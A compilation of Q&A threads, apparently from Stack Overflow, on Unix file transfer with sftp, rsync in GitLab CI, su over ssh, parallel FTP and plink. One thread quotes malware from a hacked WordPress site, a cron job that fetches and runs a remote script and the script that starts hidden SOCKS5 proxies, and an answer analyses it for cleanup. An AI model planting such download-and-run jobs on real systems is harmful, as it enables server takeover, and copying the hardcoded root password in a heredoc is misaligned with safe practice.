Delete local AIX files after a successful upload to an SFTP server - sftp

I have two AIX SFTP servers.
I want to move multiple files starting from word cash, e.g. cash2001.txt from one server to another using an sftp script and then want to delete the successfully moved files from the original server.
I have tried blow script but its not working
sftp -P 10022 EUSER_20233#11.214.6.920 <<EOF
put /data/sftp/current/cash*
exit
rm /data/sftp/current/cash*
EOF

As the rm should be deleting local files, you must execute it in shell, not in sftp:
sftp -P 10022 EUSER_20233#11.214.6.920 <<EOF
put /data/sftp/current/cash*
exit
EOF
rm /data/sftp/current/cash*
You may want to improve your code to delete the files, when the transfer succeeds only. Based on How to confirm SFTP file delivery?, you can do (in bash, I do not know AIX):
sftp -P 10022 EUSER_20233#11.214.6.920 -b - <<EOF
put /data/sftp/current/cash*
exit
EOF
if [ $? -eq 0 ]
then
rm /data/sftp/current/cash*
fi

Related

Using rsync with gitlab-ci how to deploy identically?

when I push and that, on my server, I don't have my project, everything is fine (obviously):
rsync --exclude=".git" -e ssh -avz --delete-after . $SSH_USER#$SSH_HOST:blog_symfony/
building file list ... done
created directory blog_symfony
[...]
sent 44,533,927 bytes received 5,523 bytes 5,239,935.29 bytes/sec
total size is 238,959,003 speedup is 5.37
the problem when I push a 2nd time, it does anything to me:
rsync: [generator] delete_file: rmdir(project/blog_symfony/project/blog_symfony) failed: Permission denied (13)
rsync: [generator] delete_file: rmdir(project/blog_symfony) failed: Permission denied (13)
deleting project/blog_symfony/translations/.gitignore
deleting project/blog_symfony/translations/
[...]
it creates for me, on my server side, a 'project' folder in the blog_symfony folder
annot delete non-empty directory: project/blog_symfony
cannot delete non-empty directory: project
rsync error: some files/attrs were not transferred (see previous errors) (code 23) at main.c(1207) [sender=3.1.3]
sent 13,924 bytes received 175 bytes 28,198.00 bytes/sec
total size is 238,959,004 speedup is 16,948.65
Cleaning up project directory and file based variables 00:01
ERROR: Job failed: exit code 1
my gitlab-ci:
before_script:
- 'which ssh-agent || ( apt-get update -y && apt-get install openssh-client -y )'
- eval $(ssh-agent -s)
- echo "$SSH_PRIVATE_KEY" | tr -d '\r' | ssh-add -
- mkdir -p ~/.ssh
- chmod 700 ~/.ssh
- '[[ -f /.dockerenv ]] && echo -e "Host *\n\tStrictHostKeyChecking no\n\n" >> ~/.ssh/config'
script:
- ls
- apt-get update && apt-get install rsync -y
- ssh $SSH_USER#$SSH_HOST "ls"
- rsync --exclude=".git" -e ssh -avz --delete-after . $SSH_USER#$SSH_HOST:blog_symfony/
- ssh $SSH_USER#$SSH_HOST "cd blog_symfony && docker-compose build && docker-compose up"
in ls -l I have a folder written by rsync and which is impossible to remove from gitlab-ci:
drwxrwxr-x 3 root root 4096 Dec 14 23:26 project
I don't think this is normal. This is the first time that I use gitlab-ci for a symfony project.
Thank you for your help
ls -l: I have a folder written by rsync and which is impossible to remove from GitLab CI.
Check if that folder is instead created after the first execution of your docker-compose up: if your Docker image execute itself internally as USER root, using a bind mount, it would write files/folders as root.
And that would impede normal operation (on the server, outside the container), like your rsync, because root files would be i the way.

How to copy files to remote server with a user without privileges?

When I need to copy a file from local server (server A) to remote server(server B) via SSH, using a user with enough privileges, I do this successfuly like below
localpath='/this/is/local/path/file1.txt'
remotepath='/this/is/remote/path/'
mypass='MyPassword123'
sshpass -p $mypass scp username#hostname:$localpath $remotepath
Now, I have to transfer a file from server A to server C with a user that doesn't have enough privileges to copy. Then once
I connected to Server C, I need to send su in order to be able to send commands like cd, ls, etc.
Manually, I access the server C via SSH like this:
[root#ServerA ~]# ssh username#hostname
You are trying to access a restricted zone. Only Authorized Users allowed.
Password:
Last login: Sat Jun 13 10:17:40 2020 from XXX.XXX.XXX.XXX
ServerC ~ $
ServerC ~ $ su
Password:
ServerC /home/myuser #
ServerC /home/myuser # cd /documents/backups/
ServerC /documents/backups #
At this moment myuser has superuser privileges and I can send commands.
Then, how can I automate the task to copy files from server A to server C with the need to send su once I'm connected to Server C?
I've tried so far doing like this:
sshpass -p $mypass ssh -t username#hostname "su -c \"cd /documents/backups/ && ls\""
it requests password for su and I'm able to send cd and ls but with this command, I'm not copying files from Server A to Server C, only semi-automating the access to Server C and sending the su in Server C.
Thanks in advance for any help.
UPDATE
# $TAR | ssh $username#$hostname "$COMMAND"
+ tar -cv -C /this/is/local/path/file1.txt .
+ ssh username#X.X.X.X 'set -x; rm -f /tmp/copy && mknod /tmp/copy p; su - <<< "su_password
set -x; tar -xv -C /this/is/remote/path/ . < /tmp/copy" & cat > /tmp/copy'
tar: /this/is/local/path/file1.txt: Cannot chdir: Not a directory
tar: Error is not recoverable: exiting now
You are trying to access a restricted zone. Only Authorized Users allowed.
Password:
+ rm -f /tmp/copy
+ mknod /tmp/copy p
+ su -
+ cat
Password:
Editorial note: the previous version of this answer used sudo, the current version uses su as requested in the question.
You could use tar and pipes, like so:
TAR="tar -cv -C $localpath ."
UNTAR="tar -xv -C $remotepath ."
PREPARE_PIPE="rm -f /tmp/copy && mknod /tmp/copy p"
NEWLINE=$'\n' # that's the easiest way to get a literal newline
ROOT_PASSWORD=rootpasswordverydangerous
COMMAND="set -x; $PREPARE_PIPE; su - <<< \"${ROOT_PASSWORD}${NEWLINE} set -x; $UNTAR < /tmp/copy\" & cat > /tmp/copy"
$TAR | ssh username#hostname "$COMMAND"
Explanation:
tar -c . archives the current directory into a single file. We aren't passing -f to tar, so that single file is standard output.
tar -x . extracts the content of a single tar archive file to the current directory. We aren't passing -f to tar, so that single file is standard input.
-C <path> tells tar to cd into <path> so that it will be the current directory in which files are copied from/to.
-v just tells tar to list the files tar archives/extracts, for debugging purposes.
Likewise, set -x is just to have bash to emit trace information, for debugging purposes.
So we're archiving $localpath into stdout, and piping it to ssh, which will pipe it to $COMMAND.
If there was a way to give su the password in the command line, we would have used something like:
$TAR | ssh ... su --password ${ROOT_PASSWORD} -c "$UNTAR"
and things would have been simple.
But su doesn't have that. su runs like a shell, reading from stdin. So it will first read the password, and once the password is read and su has established a root session, it reads commands from stdin. That's why we have su - <<< \"${ROOT_PASSWORD}${NEWLINE}${UNTAR}.
But now stdin is used by the password and command, so we can't use it as the archive. We could use another file descriptor, but I prefer not to, because then the solution can be more easily ported to work with sudo instead of su. sudo closes all file descriptors, and sudo -C 200 (only close file descriptors above 200) may not work (didn't work on my test machine).
if we went that direction, we would have used something like
$TAR | ssh ... 'exec 9<&2 && sudo -S <<< $mypass bash -c "$UNTAR <&9"'
Our next option is to do something like cat > /tmp/archive.tar in order to write the entire archive into a file, and then have something like $UNTAR < /tmp/archive.tar. But the archive may be huge and we may run out of disk space.
So the idea is to create a dedicated pipe - that's PREPARE_PIPE. Pipes don't save anything to disk, and don't store the entire stream in memory, so the reader and the writer have to work concurrently (you know, like with a real pipe).
So having redirected su's stdin from $ROOT_PASSWORD, we pull ssh's stdin into our pipe with cat > /tmp/copy, and in parallel (&) having $UNTAR read from the pipe (< /tmp/copy).
Notes:
You could also pass -z to both tar commands to pass it compressed, if your network is too slow.
tar will preserve the source's metadata, e.g. timestamps and ownership.
Passing $ROOT_PASSWORD to commands is not good practice, anyone who runs ps -ef can see the password. There are ways to pass the password to server C in a more secure way, I didn't include it in order to not further complicate this answer.
I would suggest asking the server's owner to install sudo, so that if the password is compromised via ps -ef, at least it's not the root password.

some malware that appeared on our site related to the recent wordpress attack

Apparently I site I do some volunteer work for was one of a few thousand sites targeted in a recent hack that exploited some vulnerability in wordpress. The result of the breach was a cron job added to the site:
0 */48 * * * cd /tmp;wget clintonandersonperformancehorses.com/test/test;bash test;cd /tmp;rm -rf test
the file it was pulling is this (obviously, don't try to execute this...)
killall -9 perl
cd /tmp
wget clintonandersonperformancehorses.com/test/stest.tar
tar -vxf stest.tar
rm -rf stest.tar
cd stest
sh getip >>bug.txt
/sbin/ifconfig |grep "inet addr" |grep -v 127.0.0 |grep -v \:.192\. |awk -F ':' '{print $2}' |awk -F ' ' '{print $1}' >>bug.txt
cat bug.txt |sort |uniq >clean.txt
rm -rf bug.txt
bash mbind clean.txt
bash binded.txt
cd ..
rm -rf stest
I was hoping someone could tell me what it does? I cleaned out the cron job and will follow all the other advice available to secure the site again, but I am worried that some additional damage might have been done that is not as obvious. I just can't figure out what the heck that file was actually doing.
I just can't figure out what the heck that file was actually doing.
Quick Summary
In summary, It kills all perl processes and then starts up SOCKS5 servers on all the machine's external IP addresses.
In Depth
In more detail, let's look at the script line-by-line:
killall -9 perl
This kills all perl processes.
cd /tmp
wget clintonandersonperformancehorses.com/test/stest.tar
tar -vxf stest.tar
rm -rf stest.tar
cd stest
The above downloads the file stest.tar and untars it in the /tmp/stest directory, deletes the tar file, and moves into the directory which now holds the downloaded files.
sh getip >>bug.txt
The getip script, part of stest.tar, uses icanhazip.com to find your public IP address and stores that in the file bug.txt.
/sbin/ifconfig |grep "inet addr" |grep -v 127.0.0 |grep -v \:.192\. |awk -F ':' '{print $2}' |awk -F ' ' '{print $1}' >>bug.txt
cat bug.txt |sort |uniq >clean.txt
rm -rf bug.txt
The above uses ifconfig to check for any other non-local IP addresses that your machine answers to and adds them to bug.txt. Duplicates are removed and the final list of your public IP addresses is saved in the file clean.txt.
bash mbind clean.txt
This is the meat of the script. mbind, which was part of stest.tar, runs the script inst on each IP address in clean.txt. For that IP address, inst, also part of stest.tar, selects a port at random and starts a copy of "Simple SOCKS5 Server for Perl" on that IP and that port.
More specifically, the SOCKS server that is run is version 1.4 of Simple Socks Server for Perl which can be downloaded from sourceforge. The version used here differs from the sourceforge in only minor respects: a help message is suppressed, the md5 option is removed, and the IP and port are included in the script, rather than passed on in on the command line. I suspect that the purpose of the latter change is make the script's command line look relatively innocuous when viewed with a utility such as ps.
bash binded.txt
The script binded.txt was created by inst. It apparently runs a check on the SOCKS5 server.
cd ..
rm -rf stest
The last part just does clean-up. It removes all the un-tarred files and the temporary files created by the scripts.
How to determine if one of the SOCKS servers is still running
The script inst (part of the .tar file) starts each SOCKS server with the command:
/usr/bin/perl httpd
To see if one is still running, look through the output of ps wax and see if you see that command. If you do it, use the kill command to stop it.

How do I FTP multiple files at the same time ( parallel) from UNIX

We have to transfer 10 files in parallel from a unix using shell script via FTP.
Just put download process in the background appending ampersand:
wget --ftp-user=*** --ftp-password=*** ftp://server/file_A 1> /dev/null 2> /dev/null&
wget --ftp-user=*** --ftp-password=*** ftp://server/file_B 1> /dev/null 2> /dev/null&
wget --ftp-user=*** --ftp-password=*** ftp://server/file_C 1> /dev/null 2> /dev/null&
...
If the ftp server doesn't impose any limits to the number of concurrent connections, you can run many ftp sessions in background. E.g. (note: I'll assume a generic gnu-like ftp client, command line options and input strings may be different):
for i in file1 file2 file3 ... file10; do
echo "get $i" | ftp $ServerHost --user $username --password "$xxx" --binary >/dev/null 2>&1 &
done
wait

Problem with plink output

I'm using plink to run a command on a Unix remote machine.
The command is:
ls -1trd testegrep.txt |tail -1 |xargs tail -f| grep 's';
The way I'm sending this command is by using a file with a set of commands like:
plink.exe -ssh -t -l user -pw pwd tst.url.pt -m commands.out
When I run the command this way the plink does not receive any input. It seems that is waiting for input.
But if I run:
plink.exe -ssh -t -l user -pw pwd tst.url.pt "ls -1trd testegrep.txt |tail -1 |xargs tail -f| grep 's';"
I get the expected result.
I'm not using the plink with a file with the command because I choose so. I'm using a test automation software that allows me to run tests on remote hosts and this is the way the tool works.
Any thoughts on what is going wrong?
I tested the command you provided and it worked without problems.
Maybe the problem is related to:
The server's host key is not cached in the registry.
The path to the file is not correct.
The file is empty.
include server hostkey
most importantly, you need to include the unix profile using the -m paramater
You can include all your commands in the same file where the profile is kept also.
$Output = ((plink.exe -hostkey hostkey -l UNAME -i SSHKEY -P 22 -ssh server -batch -m PROFILE) | ? {$_ -ne ""})

Resources